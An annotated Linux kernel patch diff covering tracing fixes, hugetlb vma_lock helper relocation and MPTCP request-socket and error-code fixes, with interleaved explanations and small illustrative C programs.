+@@ -1888,6 +1888,7 @@ update_max_tr_single(struct trace_array *tr, struct task_struct *tsk, int cpu)
+ 	__update_max_tr(tr, tsk, cpu);
+ 	arch_spin_unlock(&tr->max_lock);
+ }
++
+ #endif /* CONFIG_TRACER_MAX_TRACE */
+ 
+ static int wait_on_pipe(struct trace_iterator *iter, int full)
+@@ -6572,7 +6573,7 @@ out:
+ 	return ret;
+ }
+ 
+-#if defined(CONFIG_TRACER_MAX_TRACE) || defined(CONFIG_HWLAT_TRACER)
++#ifdef CONFIG_TRACER_MAX_TRACE
+ 
+ static ssize_t
+ tracing_max_lat_read(struct file *filp, char __user *ubuf,
+@@ -6796,7 +6797,20 @@ waitagain:
+ 
+ 		ret = print_trace_line(iter);
+ 		if (ret == TRACE_TYPE_PARTIAL_LINE) {
+-			/* don't print partial lines */
++			/*
++			 * If one print_trace_line() fills entire trace_seq in one shot,
++			 * trace_seq_to_user() will returns -EBUSY because save_len == 0,
++			 * In this case, we need to consume it, otherwise, loop will peek
++			 * this event next time, resulting in an infinite loop.
++			 */
++			if (save_len == 0) {
++				iter->seq.full = 0;
++				trace_seq_puts(&iter->seq, "[LINE TOO BIG]\n");
++				trace_consume(iter);
++				break;
++			}
++
++			/* In other cases, don't print partial lines */
+ 			iter->seq.seq.len = save_len;
+ 			break;
+ 		}
+@@ -7587,7 +7601,7 @@ static const struct file_operations tracing_thresh_fops = {
+ 	.llseek		= generic_file_llseek,
+ };
+ 
+-#if defined(CONFIG_TRACER_MAX_TRACE) || defined(CONFIG_HWLAT_TRACER)
++#ifdef CONFIG_TRACER_MAX_TRACE
+ static const struct file_operations tracing_max_lat_fops = {
+ 	.open		= tracing_open_generic,
+ 	.read		= tracing_max_lat_read,
+@@ -9601,7 +9615,9 @@ init_tracer_tracefs(struct trace_array *tr, struct dentry *d_tracer)
+ 
+ 	create_trace_options_dir(tr);
+ 
++#ifdef CONFIG_TRACER_MAX_TRACE
+ 	trace_create_maxlat_file(tr, d_tracer);
++#endif
+ 
+ 	if (ftrace_create_function_files(tr, d_tracer))
+ 		MEM_FAIL(1, "Could not allocate function filter files");
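
Regarding the tracing_read_pipe hunk earlier in this file's diff: when a single rendered event overflows an empty trace_seq, save_len is 0 and trace_seq_to_user() keeps failing with -EBUSY, so the event has to be consumed and replaced by a marker or the read loop re-peeks it forever. A toy model of that decision, not the kernel code:

#include <stdio.h>
#include <string.h>

#define SEQ_SIZE 16

int main(void)
{
	char seq[SEQ_SIZE] = "";
	const char *line = "one event longer than the whole buffer";
	size_t save_len = strlen(seq);	/* 0: buffer started empty */

	if (strlen(line) >= SEQ_SIZE - save_len) {
		if (save_len == 0) {
			/* Nothing buffered and it still doesn't fit:
			 * emit a marker and consume the event so the
			 * next iteration makes progress. */
			snprintf(seq, SEQ_SIZE, "[LINE TOO BIG]");
		}
		/* else: trim back to save_len and flush what fits */
	}
	puts(seq);
	return 0;
}
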
+diff --git a/kernel/trace/trace.h b/kernel/trace/trace.h
+index d42e245071525..5581754d97628 100644
+--- a/kernel/trace/trace.h
++++ b/kernel/trace/trace.h
+@@ -308,8 +308,7 @@ struct trace_array {
+ 	struct array_buffer	max_buffer;
+ 	bool			allocated_snapshot;
+ #endif
+-#if defined(CONFIG_TRACER_MAX_TRACE) || defined(CONFIG_HWLAT_TRACER) \
+-	|| defined(CONFIG_OSNOISE_TRACER)
++#ifdef CONFIG_TRACER_MAX_TRACE
+ 	unsigned long		max_latency;
+ #ifdef CONFIG_FSNOTIFY
+ 	struct dentry		*d_max_latency;
+@@ -688,12 +687,11 @@ void update_max_tr(struct trace_array *tr, struct task_struct *tsk, int cpu,
+ 		   void *cond_data);
+ void update_max_tr_single(struct trace_array *tr,
+ 			  struct task_struct *tsk, int cpu);
+-#endif /* CONFIG_TRACER_MAX_TRACE */
+ 
+-#if (defined(CONFIG_TRACER_MAX_TRACE) || defined(CONFIG_HWLAT_TRACER) \
+-	|| defined(CONFIG_OSNOISE_TRACER)) && defined(CONFIG_FSNOTIFY)
++#ifdef CONFIG_FSNOTIFY
+ #define LATENCY_FS_NOTIFY
+ #endif
++#endif /* CONFIG_TRACER_MAX_TRACE */
+ 
+ #ifdef LATENCY_FS_NOTIFY
+ void latency_fsnotify(struct trace_array *tr);
+@@ -1956,17 +1954,30 @@ static __always_inline void trace_iterator_reset(struct trace_iterator *iter)
+ }
+ 
+ /* Check the name is good for event/group/fields */
+-static inline bool is_good_name(const char *name)
++static inline bool __is_good_name(const char *name, bool hash_ok)
+ {
+-	if (!isalpha(*name) && *name != '_')
++	if (!isalpha(*name) && *name != '_' && (!hash_ok || *name != '-'))
+ 		return false;
+ 	while (*++name != '\0') {
+-		if (!isalpha(*name) && !isdigit(*name) && *name != '_')
++		if (!isalpha(*name) && !isdigit(*name) && *name != '_' &&
++		    (!hash_ok || *name != '-'))
+ 			return false;
+ 	}
+ 	return true;
+ }
+ 
++/* Check the name is good for event/group/fields */
++static inline bool is_good_name(const char *name)
++{
++	return __is_good_name(name, false);
++}
++
++/* Check the name is good for system */
++static inline bool is_good_system_name(const char *name)
++{
++	return __is_good_name(name, true);
++}
++
+ /* Convert certain expected symbols into '_' when generating event names */
+ static inline void sanitize_event_name(char *name)
+ {
+diff --git a/kernel/trace/trace_eprobe.c b/kernel/trace/trace_eprobe.c
+index 352b65e2b9105..753fc536525d3 100644
+--- a/kernel/trace/trace_eprobe.c
++++ b/kernel/trace/trace_eprobe.c
+@@ -564,6 +564,9 @@ static void eprobe_trigger_func(struct event_trigger_data *data,
+ {
+ 	struct eprobe_data *edata = data->private_data;
+ 
++	if (unlikely(!rec))
++		return;
++
+ 	if (unlikely(!rec))
+ 		return;
+ 
+diff --git a/kernel/trace/trace_events_hist.c b/kernel/trace/trace_events_hist.c
+index b6e5724a9ea35..c6e406995c112 100644
+--- a/kernel/trace/trace_events_hist.c
++++ b/kernel/trace/trace_events_hist.c
+@@ -617,7 +617,7 @@ struct action_data {
+ 	 * event param, and is passed to the synthetic event
+ 	 * invocation.
+ 	 */
+-	unsigned int		var_ref_idx[TRACING_MAP_VARS_MAX];
++	unsigned int		var_ref_idx[SYNTH_FIELDS_MAX];
+ 	struct synth_event	*synth_event;
+ 	bool			use_trace_keyword;
+ 	char			*synth_event_name;
+@@ -2173,7 +2173,9 @@ static struct hist_field *create_var_ref(struct hist_trigger_data *hist_data,
+ 			return ref_field;
+ 		}
+ 	}
+-
++	/* Sanity check to avoid out-of-bound write on 'hist_data->var_refs' */
++	if (hist_data->n_var_refs >= TRACING_MAP_VARS_MAX)
++		return NULL;
+ 	ref_field = create_hist_field(var_field->hist_data, NULL, flags, NULL);
+ 	if (ref_field) {
+ 		if (init_var_ref(ref_field, var_field, system, event_name)) {
+@@ -3586,6 +3588,7 @@ static int parse_action_params(struct trace_array *tr, char *params,
+ 	while (params) {
+ 		if (data->n_params >= SYNTH_FIELDS_MAX) {
+ 			hist_err(tr, HIST_ERR_TOO_MANY_PARAMS, 0);
++			ret = -EINVAL;
+ 			goto out;
+ 		}
+ 
+@@ -3922,6 +3925,10 @@ static int trace_action_create(struct hist_trigger_data *hist_data,
+ 
+ 	lockdep_assert_held(&event_mutex);
+ 
++	/* Sanity check to avoid out-of-bound write on 'data->var_ref_idx' */
++	if (data->n_params > SYNTH_FIELDS_MAX)
++		return -EINVAL;
++
+ 	if (data->use_trace_keyword)
+ 		synth_event_name = data->synth_event_name;
+ 	else
+diff --git a/kernel/trace/trace_events_synth.c b/kernel/trace/trace_events_synth.c
+index c3b582d19b620..67592eed0be8d 100644
+--- a/kernel/trace/trace_events_synth.c
++++ b/kernel/trace/trace_events_synth.c
+@@ -1282,12 +1282,12 @@ static int __create_synth_event(const char *name, const char *raw_fields)
+ 				goto err_free_arg;
+ 			}
+ 
+-			fields[n_fields++] = field;
+ 			if (n_fields == SYNTH_FIELDS_MAX) {
+ 				synth_err(SYNTH_ERR_TOO_MANY_FIELDS, 0);
+ 				ret = -EINVAL;
+ 				goto err_free_arg;
+ 			}
++			fields[n_fields++] = field;
+ 
+ 			n_fields_this_loop++;
+ 		}
+diff --git a/kernel/trace/trace_probe.c b/kernel/trace/trace_probe.c
+index 36dff277de464..bb2f95d7175c2 100644
+--- a/kernel/trace/trace_probe.c
++++ b/kernel/trace/trace_probe.c
+@@ -246,7 +246,7 @@ int traceprobe_parse_event_name(const char **pevent, const char **pgroup,
+ 			return -EINVAL;
+ 		}
+ 		strlcpy(buf, event, slash - event + 1);
+-		if (!is_good_name(buf)) {
++		if (!is_good_system_name(buf)) {
+ 			trace_probe_log_err(offset, BAD_GROUP_NAME);
+ 			return -EINVAL;
+ 		}
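
The trace_probe change above leans on the new is_good_system_name() helper from trace.h: group (system) names may carry a '-', which plain is_good_name() still rejects for event and field names. A standalone version of the check for experimentation (dash_ok mirrors the helper's hash_ok flag):

#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>

static bool good_name(const char *name, bool dash_ok)
{
	if (!isalpha((unsigned char)*name) && *name != '_' &&
	    (!dash_ok || *name != '-'))
		return false;
	while (*++name != '\0') {
		if (!isalpha((unsigned char)*name) &&
		    !isdigit((unsigned char)*name) && *name != '_' &&
		    (!dash_ok || *name != '-'))
			return false;
	}
	return true;
}

int main(void)
{
	printf("%d %d\n",
	       good_name("irq-vectors", true),	/* 1: ok as a system */
	       good_name("irq-vectors", false));/* 0: bad as an event */
	return 0;
}
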
+diff --git a/lib/Kconfig.debug b/lib/Kconfig.debug
+index 3638b3424be53..12dfe6691dd52 100644
+--- a/lib/Kconfig.debug
++++ b/lib/Kconfig.debug
+@@ -2092,6 +2092,7 @@ config TEST_MIN_HEAP
+ config TEST_SORT
+ 	tristate "Array-based sort test" if !KUNIT_ALL_TESTS
+ 	depends on KUNIT
++	select STACKTRACE if ARCH_CORRECT_STACKTRACE_ON_KRETPROBE
+ 	default KUNIT_ALL_TESTS
+ 	help
+ 	  This option enables the self-test function of 'sort()' at boot,
+diff --git a/mm/hugetlb.c b/mm/hugetlb.c
+index e36ca75311a5c..9c251faeb6f59 100644
+--- a/mm/hugetlb.c
++++ b/mm/hugetlb.c
+@@ -255,6 +255,152 @@ static inline struct hugepage_subpool *subpool_vma(struct vm_area_struct *vma)
+ 	return subpool_inode(file_inode(vma->vm_file));
+ }
+ 
++/*
++ * hugetlb vma_lock helper routines
++ */
++static bool __vma_shareable_lock(struct vm_area_struct *vma)
++{
++	return vma->vm_flags & (VM_MAYSHARE | VM_SHARED) &&
++		vma->vm_private_data;
++}
++
++void hugetlb_vma_lock_read(struct vm_area_struct *vma)
++{
++	if (__vma_shareable_lock(vma)) {
++		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
++
++		down_read(&vma_lock->rw_sema);
++	}
++}
++
++void hugetlb_vma_unlock_read(struct vm_area_struct *vma)
++{
++	if (__vma_shareable_lock(vma)) {
++		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
++
++		up_read(&vma_lock->rw_sema);
++	}
++}
++
++void hugetlb_vma_lock_write(struct vm_area_struct *vma)
++{
++	if (__vma_shareable_lock(vma)) {
++		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
++
++		down_write(&vma_lock->rw_sema);
++	}
++}
++
++void hugetlb_vma_unlock_write(struct vm_area_struct *vma)
++{
++	if (__vma_shareable_lock(vma)) {
++		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
++
++		up_write(&vma_lock->rw_sema);
++	}
++}
++
++int hugetlb_vma_trylock_write(struct vm_area_struct *vma)
++{
++	struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
++
++	if (!__vma_shareable_lock(vma))
++		return 1;
++
++	return down_write_trylock(&vma_lock->rw_sema);
++}
++
++void hugetlb_vma_assert_locked(struct vm_area_struct *vma)
++{
++	if (__vma_shareable_lock(vma)) {
++		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
++
++		lockdep_assert_held(&vma_lock->rw_sema);
++	}
++}
++
++void hugetlb_vma_lock_release(struct kref *kref)
++{
++	struct hugetlb_vma_lock *vma_lock = container_of(kref,
++			struct hugetlb_vma_lock, refs);
++
++	kfree(vma_lock);
++}
++
++static void __hugetlb_vma_unlock_write_put(struct hugetlb_vma_lock *vma_lock)
++{
++	struct vm_area_struct *vma = vma_lock->vma;
++
++	/*
++	 * vma_lock structure may or not be released as a result of put,
++	 * it certainly will no longer be attached to vma so clear pointer.
++	 * Semaphore synchronizes access to vma_lock->vma field.
++	 */
++	vma_lock->vma = NULL;
++	vma->vm_private_data = NULL;
++	up_write(&vma_lock->rw_sema);
++	kref_put(&vma_lock->refs, hugetlb_vma_lock_release);
++}
++
++static void __hugetlb_vma_unlock_write_free(struct vm_area_struct *vma)
++{
++	if (__vma_shareable_lock(vma)) {
++		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
++
++		__hugetlb_vma_unlock_write_put(vma_lock);
++	}
++}
++
++static void hugetlb_vma_lock_free(struct vm_area_struct *vma)
++{
++	/*
++	 * Only present in sharable vmas.
++	 */
++	if (!vma || !__vma_shareable_lock(vma))
++		return;
++
++	if (vma->vm_private_data) {
++		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
++
++		down_write(&vma_lock->rw_sema);
++		__hugetlb_vma_unlock_write_put(vma_lock);
++	}
++}
++
++static void hugetlb_vma_lock_alloc(struct vm_area_struct *vma)
++{
++	struct hugetlb_vma_lock *vma_lock;
++
++	/* Only establish in (flags) sharable vmas */
++	if (!vma || !(vma->vm_flags & VM_MAYSHARE))
++		return;
++
++	/* Should never get here with non-NULL vm_private_data */
++	if (vma->vm_private_data)
++		return;
++
++	vma_lock = kmalloc(sizeof(*vma_lock), GFP_KERNEL);
++	if (!vma_lock) {
++		/*
++		 * If we can not allocate structure, then vma can not
++		 * participate in pmd sharing.  This is only a possible
++		 * performance enhancement and memory saving issue.
++		 * However, the lock is also used to synchronize page
++		 * faults with truncation.  If the lock is not present,
++		 * unlikely races could leave pages in a file past i_size
++		 * until the file is removed.  Warn in the unlikely case of
++		 * allocation failure.
++		 */
++		pr_warn_once("HugeTLB: unable to allocate vma specific lock\n");
++		return;
++	}
++
++	kref_init(&vma_lock->refs);
++	init_rwsem(&vma_lock->rw_sema);
++	vma_lock->vma = vma;
++	vma->vm_private_data = vma_lock;
++}
++
+ /* Helper that removes a struct file_region from the resv_map cache and returns
+  * it for use.
+  */
+@@ -6557,7 +6703,8 @@ bool hugetlb_reserve_pages(struct inode *inode,
+ 	}
+ 
+ 	/*
+-	 * vma specific semaphore used for pmd sharing synchronization
++	 * vma specific semaphore used for pmd sharing and fault/truncation
++	 * synchronization
+ 	 */
+ 	hugetlb_vma_lock_alloc(vma);
+ 
+@@ -6813,149 +6960,6 @@ void adjust_range_if_pmd_sharing_possible(struct vm_area_struct *vma,
+ 		*end = ALIGN(*end, PUD_SIZE);
+ }
+ 
+-static bool __vma_shareable_flags_pmd(struct vm_area_struct *vma)
+-{
+-	return vma->vm_flags & (VM_MAYSHARE | VM_SHARED) &&
+-		vma->vm_private_data;
+-}
+-
+-void hugetlb_vma_lock_read(struct vm_area_struct *vma)
+-{
+-	if (__vma_shareable_flags_pmd(vma)) {
+-		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
+-
+-		down_read(&vma_lock->rw_sema);
+-	}
+-}
+-
+-void hugetlb_vma_unlock_read(struct vm_area_struct *vma)
+-{
+-	if (__vma_shareable_flags_pmd(vma)) {
+-		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
+-
+-		up_read(&vma_lock->rw_sema);
+-	}
+-}
+-
+-void hugetlb_vma_lock_write(struct vm_area_struct *vma)
+-{
+-	if (__vma_shareable_flags_pmd(vma)) {
+-		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
+-
+-		down_write(&vma_lock->rw_sema);
+-	}
+-}
+-
+-void hugetlb_vma_unlock_write(struct vm_area_struct *vma)
+-{
+-	if (__vma_shareable_flags_pmd(vma)) {
+-		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
+-
+-		up_write(&vma_lock->rw_sema);
+-	}
+-}
+-
+-int hugetlb_vma_trylock_write(struct vm_area_struct *vma)
+-{
+-	struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
+-
+-	if (!__vma_shareable_flags_pmd(vma))
+-		return 1;
+-
+-	return down_write_trylock(&vma_lock->rw_sema);
+-}
+-
+-void hugetlb_vma_assert_locked(struct vm_area_struct *vma)
+-{
+-	if (__vma_shareable_flags_pmd(vma)) {
+-		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
+-
+-		lockdep_assert_held(&vma_lock->rw_sema);
+-	}
+-}
+-
+-void hugetlb_vma_lock_release(struct kref *kref)
+-{
+-	struct hugetlb_vma_lock *vma_lock = container_of(kref,
+-			struct hugetlb_vma_lock, refs);
+-
+-	kfree(vma_lock);
+-}
+-
+-static void __hugetlb_vma_unlock_write_put(struct hugetlb_vma_lock *vma_lock)
+-{
+-	struct vm_area_struct *vma = vma_lock->vma;
+-
+-	/*
+-	 * vma_lock structure may or not be released as a result of put,
+-	 * it certainly will no longer be attached to vma so clear pointer.
+-	 * Semaphore synchronizes access to vma_lock->vma field.
+-	 */
+-	vma_lock->vma = NULL;
+-	vma->vm_private_data = NULL;
+-	up_write(&vma_lock->rw_sema);
+-	kref_put(&vma_lock->refs, hugetlb_vma_lock_release);
+-}
+-
+-static void __hugetlb_vma_unlock_write_free(struct vm_area_struct *vma)
+-{
+-	if (__vma_shareable_flags_pmd(vma)) {
+-		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
+-
+-		__hugetlb_vma_unlock_write_put(vma_lock);
+-	}
+-}
+-
+-static void hugetlb_vma_lock_free(struct vm_area_struct *vma)
+-{
+-	/*
+-	 * Only present in sharable vmas.
+-	 */
+-	if (!vma || !__vma_shareable_flags_pmd(vma))
+-		return;
+-
+-	if (vma->vm_private_data) {
+-		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
+-
+-		down_write(&vma_lock->rw_sema);
+-		__hugetlb_vma_unlock_write_put(vma_lock);
+-	}
+-}
+-
+-static void hugetlb_vma_lock_alloc(struct vm_area_struct *vma)
+-{
+-	struct hugetlb_vma_lock *vma_lock;
+-
+-	/* Only establish in (flags) sharable vmas */
+-	if (!vma || !(vma->vm_flags & VM_MAYSHARE))
+-		return;
+-
+-	/* Should never get here with non-NULL vm_private_data */
+-	if (vma->vm_private_data)
+-		return;
+-
+-	vma_lock = kmalloc(sizeof(*vma_lock), GFP_KERNEL);
+-	if (!vma_lock) {
+-		/*
+-		 * If we can not allocate structure, then vma can not
+-		 * participate in pmd sharing.  This is only a possible
+-		 * performance enhancement and memory saving issue.
+-		 * However, the lock is also used to synchronize page
+-		 * faults with truncation.  If the lock is not present,
+-		 * unlikely races could leave pages in a file past i_size
+-		 * until the file is removed.  Warn in the unlikely case of
+-		 * allocation failure.
+-		 */
+-		pr_warn_once("HugeTLB: unable to allocate vma specific lock\n");
+-		return;
+-	}
+-
+-	kref_init(&vma_lock->refs);
+-	init_rwsem(&vma_lock->rw_sema);
+-	vma_lock->vma = vma;
+-	vma->vm_private_data = vma_lock;
+-}
+-
+ /*
+  * Search for a shareable pmd page for hugetlb. In any case calls pmd_alloc()
+  * and returns the corresponding pte. While this is not necessary for the
+@@ -7044,47 +7048,6 @@ int huge_pmd_unshare(struct mm_struct *mm, struct vm_area_struct *vma,
+ 
+ #else /* !CONFIG_ARCH_WANT_HUGE_PMD_SHARE */
+ 
+-void hugetlb_vma_lock_read(struct vm_area_struct *vma)
+-{
+-}
+-
+-void hugetlb_vma_unlock_read(struct vm_area_struct *vma)
+-{
+-}
+-
+-void hugetlb_vma_lock_write(struct vm_area_struct *vma)
+-{
+-}
+-
+-void hugetlb_vma_unlock_write(struct vm_area_struct *vma)
+-{
+-}
+-
+-int hugetlb_vma_trylock_write(struct vm_area_struct *vma)
+-{
+-	return 1;
+-}
+-
+-void hugetlb_vma_assert_locked(struct vm_area_struct *vma)
+-{
+-}
+-
+-void hugetlb_vma_lock_release(struct kref *kref)
+-{
+-}
+-
+-static void __hugetlb_vma_unlock_write_free(struct vm_area_struct *vma)
+-{
+-}
+-
+-static void hugetlb_vma_lock_free(struct vm_area_struct *vma)
+-{
+-}
+-
+-static void hugetlb_vma_lock_alloc(struct vm_area_struct *vma)
+-{
+-}
+-
+ pte_t *huge_pmd_share(struct mm_struct *mm, struct vm_area_struct *vma,
+ 		      unsigned long addr, pud_t *pud)
+ {
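
The hugetlb move above pulls the vma_lock helpers out of the CONFIG_ARCH_WANT_HUGE_PMD_SHARE block because the lock now also serializes faults against truncation, as the updated comment notes. The subtle part is the lifetime rule in __hugetlb_vma_unlock_write_put(): both back-pointers are cleared while the semaphore is still held, and only then is the reference dropped. A simplified stand-in with the locking elided (names are illustrative):

#include <stdio.h>
#include <stdlib.h>

struct vma;

struct vma_lock {
	int refs;
	struct vma *vma;	/* back-pointer, cleared on final unlock */
};

struct vma {
	struct vma_lock *priv;	/* stand-in for vm_private_data */
};

static void put_lock(struct vma_lock *l)
{
	if (--l->refs == 0)
		free(l);
}

static void unlock_write_put(struct vma *v)
{
	struct vma_lock *l = v->priv;

	/* Detach both directions while the lock is still held, so a
	 * racing reader sees NULL instead of a soon-to-be-freed lock;
	 * up_write(&l->rw_sema) would sit between these and the put. */
	l->vma = NULL;
	v->priv = NULL;
	put_lock(l);		/* may drop the final reference */
}

int main(void)
{
	struct vma v;
	struct vma_lock *l = malloc(sizeof(*l));

	if (!l)
		return 1;
	l->refs = 1;
	l->vma = &v;
	v.priv = l;
	unlock_write_put(&v);
	printf("priv=%p\n", (void *)v.priv);	/* (nil) */
	return 0;
}
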
+diff --git a/net/ipv4/syncookies.c b/net/ipv4/syncookies.c
+index 942d2dfa11151..26fb97d1d4d9a 100644
+--- a/net/ipv4/syncookies.c
++++ b/net/ipv4/syncookies.c
+@@ -288,12 +288,11 @@ struct request_sock *cookie_tcp_reqsk_alloc(const struct request_sock_ops *ops,
+ 	struct tcp_request_sock *treq;
+ 	struct request_sock *req;
+ 
+-#ifdef CONFIG_MPTCP
+ 	if (sk_is_mptcp(sk))
+-		ops = &mptcp_subflow_request_sock_ops;
+-#endif
++		req = mptcp_subflow_reqsk_alloc(ops, sk, false);
++	else
++		req = inet_reqsk_alloc(ops, sk, false);
+ 
+-	req = inet_reqsk_alloc(ops, sk, false);
+ 	if (!req)
+ 		return NULL;
+ 
+diff --git a/net/mptcp/pm_userspace.c b/net/mptcp/pm_userspace.c
+index 9e82250cbb703..0430415357ba3 100644
+--- a/net/mptcp/pm_userspace.c
++++ b/net/mptcp/pm_userspace.c
+@@ -156,6 +156,7 @@ int mptcp_nl_cmd_announce(struct sk_buff *skb, struct genl_info *info)
+ 
+ 	if (addr_val.addr.id == 0 || !(addr_val.flags & MPTCP_PM_ADDR_FLAG_SIGNAL)) {
+ 		GENL_SET_ERR_MSG(info, "invalid addr id or flags");
++		err = -EINVAL;
+ 		goto announce_err;
+ 	}
+ 
+@@ -282,6 +283,7 @@ int mptcp_nl_cmd_sf_create(struct sk_buff *skb, struct genl_info *info)
+ 
+ 	if (addr_l.id == 0) {
+ 		NL_SET_ERR_MSG_ATTR(info->extack, laddr, "missing local addr id");
++		err = -EINVAL;
+ 		goto create_err;
+ 	}
+ 
+@@ -395,11 +397,13 @@ int mptcp_nl_cmd_sf_destroy(struct sk_buff *skb, struct genl_info *info)
+ 
+ 	if (addr_l.family != addr_r.family) {
+ 		GENL_SET_ERR_MSG(info, "address families do not match");
++		err = -EINVAL;
+ 		goto destroy_err;
+ 	}
+ 
+ 	if (!addr_l.port || !addr_r.port) {
+ 		GENL_SET_ERR_MSG(info, "missing local or remote port");
++		err = -EINVAL;
+ 		goto destroy_err;
+ 	}
+ 
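
The three pm_userspace.c hunks above all fix the same bug class: a validation failure jumped to the exit label without setting err, so the function could report success. Each failure path must assign its error before the goto. A minimal compilable illustration of the pattern (not the kernel function):

#include <errno.h>
#include <stdio.h>

static int validate(int id)
{
	int err = 0;

	if (id == 0) {
		err = -EINVAL;	/* the assignment the fix adds */
		goto out;
	}
out:
	return err;
}

int main(void)
{
	printf("%d %d\n", validate(0), validate(7));	/* -22 0 */
	return 0;
}
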
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index 2159b5f9988f8..613f515fedf0a 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -45,7 +45,6 @@ static void subflow_req_destructor(struct request_sock *req)
+ 		sock_put((struct sock *)subflow_req->msk);
+ 
+ 	mptcp_token_destroy_request(req);
+-	tcp_request_sock_ops.destructor(req);
+ }
+ 
+ static void subflow_generate_hmac(u64 key1, u64 key2, u32 nonce1, u32 nonce2,
+@@ -529,7 +528,7 @@ static int subflow_v6_rebuild_header(struct sock *sk)
+ }
+ #endif
+ 
+-struct request_sock_ops mptcp_subflow_request_sock_ops;
++static struct request_sock_ops mptcp_subflow_v4_request_sock_ops __ro_after_init;
+ static struct tcp_request_sock_ops subflow_request_sock_ipv4_ops __ro_after_init;
+ 
+ static int subflow_v4_conn_request(struct sock *sk, struct sk_buff *skb)
+@@ -542,7 +541,7 @@ static int subflow_v4_conn_request(struct sock *sk, struct sk_buff *skb)
+ 	if (skb_rtable(skb)->rt_flags & (RTCF_BROADCAST | RTCF_MULTICAST))
+ 		goto drop;
+ 
+-	return tcp_conn_request(&mptcp_subflow_request_sock_ops,
++	return tcp_conn_request(&mptcp_subflow_v4_request_sock_ops,
+ 				&subflow_request_sock_ipv4_ops,
+ 				sk, skb);
+ drop:
+@@ -550,7 +549,14 @@ drop:
+ 	return 0;
+ }
+ 
++static void subflow_v4_req_destructor(struct request_sock *req)
++{
++	subflow_req_destructor(req);
++	tcp_request_sock_ops.destructor(req);
++}
++
+ #if IS_ENABLED(CONFIG_MPTCP_IPV6)
++static struct request_sock_ops mptcp_subflow_v6_request_sock_ops __ro_after_init;
+ static struct tcp_request_sock_ops subflow_request_sock_ipv6_ops __ro_after_init;
+ static struct inet_connection_sock_af_ops subflow_v6_specific __ro_after_init;
+ static struct inet_connection_sock_af_ops subflow_v6m_specific __ro_after_init;
+@@ -573,15 +579,36 @@ static int subflow_v6_conn_request(struct sock *sk, struct sk_buff *skb)
+ 		return 0;
+ 	}
+ 
+-	return tcp_conn_request(&mptcp_subflow_request_sock_ops,
++	return tcp_conn_request(&mptcp_subflow_v6_request_sock_ops,
+ 				&subflow_request_sock_ipv6_ops, sk, skb);
+ 
+ drop:
+ 	tcp_listendrop(sk);
+ 	return 0; /* don't send reset */
+ }
++
++static void subflow_v6_req_destructor(struct request_sock *req)
++{
++	subflow_req_destructor(req);
++	tcp6_request_sock_ops.destructor(req);
++}
++#endif
++
++struct request_sock *mptcp_subflow_reqsk_alloc(const struct request_sock_ops *ops,
++					       struct sock *sk_listener,
++					       bool attach_listener)
++{
++	if (ops->family == AF_INET)
++		ops = &mptcp_subflow_v4_request_sock_ops;
++#if IS_ENABLED(CONFIG_MPTCP_IPV6)
++	else if (ops->family == AF_INET6)
++		ops = &mptcp_subflow_v6_request_sock_ops;
+ #endif
+ 
++	return inet_reqsk_alloc(ops, sk_listener, attach_listener);
++}
++EXPORT_SYMBOL(mptcp_subflow_reqsk_alloc);
++
+ /* validate hmac received in third ACK */
+ static bool subflow_hmac_valid(const struct request_sock *req,
+ 			       const struct mptcp_options_received *mp_opt)
+@@ -1904,7 +1931,6 @@ static struct tcp_ulp_ops subflow_ulp_ops __read_mostly = {
+ static int subflow_ops_init(struct request_sock_ops *subflow_ops)
+ {
+ 	subflow_ops->obj_size = sizeof(struct mptcp_subflow_request_sock);
+-	subflow_ops->slab_name = "request_sock_subflow";
+ 
+ 	subflow_ops->slab = kmem_cache_create(subflow_ops->slab_name,
+ 					      subflow_ops->obj_size, 0,
+@@ -1914,16 +1940,17 @@ static int subflow_ops_init(struct request_sock_ops *subflow_ops)
+ 	if (!subflow_ops->slab)
+ 		return -ENOMEM;
+ 
+-	subflow_ops->destructor = subflow_req_destructor;
+-
+ 	return 0;
+ }
+ 
+ void __init mptcp_subflow_init(void)
+ {
+-	mptcp_subflow_request_sock_ops = tcp_request_sock_ops;
+-	if (subflow_ops_init(&mptcp_subflow_request_sock_ops) != 0)
+-		panic("MPTCP: failed to init subflow request sock ops\n");
++	mptcp_subflow_v4_request_sock_ops = tcp_request_sock_ops;
++	mptcp_subflow_v4_request_sock_ops.slab_name = "request_sock_subflow_v4";
++	mptcp_subflow_v4_request_sock_ops.destructor = subflow_v4_req_destructor;
++
++	if (subflow_ops_init(&mptcp_subflow_v4_request_sock_ops) != 0)
++		panic("MPTCP: failed to init subflow v4 request sock ops\n");
+ 
+ 	subflow_request_sock_ipv4_ops = tcp_request_sock_ipv4_ops;
+ 	subflow_request_sock_ipv4_ops.route_req = subflow_v4_route_req;
+@@ -1938,6 +1965,20 @@ void __init mptcp_subflow_init(void)
+ 	tcp_prot_override.release_cb = tcp_release_cb_override;
+ 
+ #if IS_ENABLED(CONFIG_MPTCP_IPV6)
++	/* In struct mptcp_subflow_request_sock, we assume the TCP request sock
++	 * structures for v4 and v6 have the same size. It should not changed in
++	 * the future but better to make sure to be warned if it is no longer
++	 * the case.
++	 */
++	BUILD_BUG_ON(sizeof(struct tcp_request_sock) != sizeof(struct tcp6_request_sock));
++
++	mptcp_subflow_v6_request_sock_ops = tcp6_request_sock_ops;
++	mptcp_subflow_v6_request_sock_ops.slab_name = "request_sock_subflow_v6";
++	mptcp_subflow_v6_request_sock_ops.destructor = subflow_v6_req_destructor;
++
++	if (subflow_ops_init(&mptcp_subflow_v6_request_sock_ops) != 0)
++		panic("MPTCP: failed to init subflow v6 request sock ops\n");
++
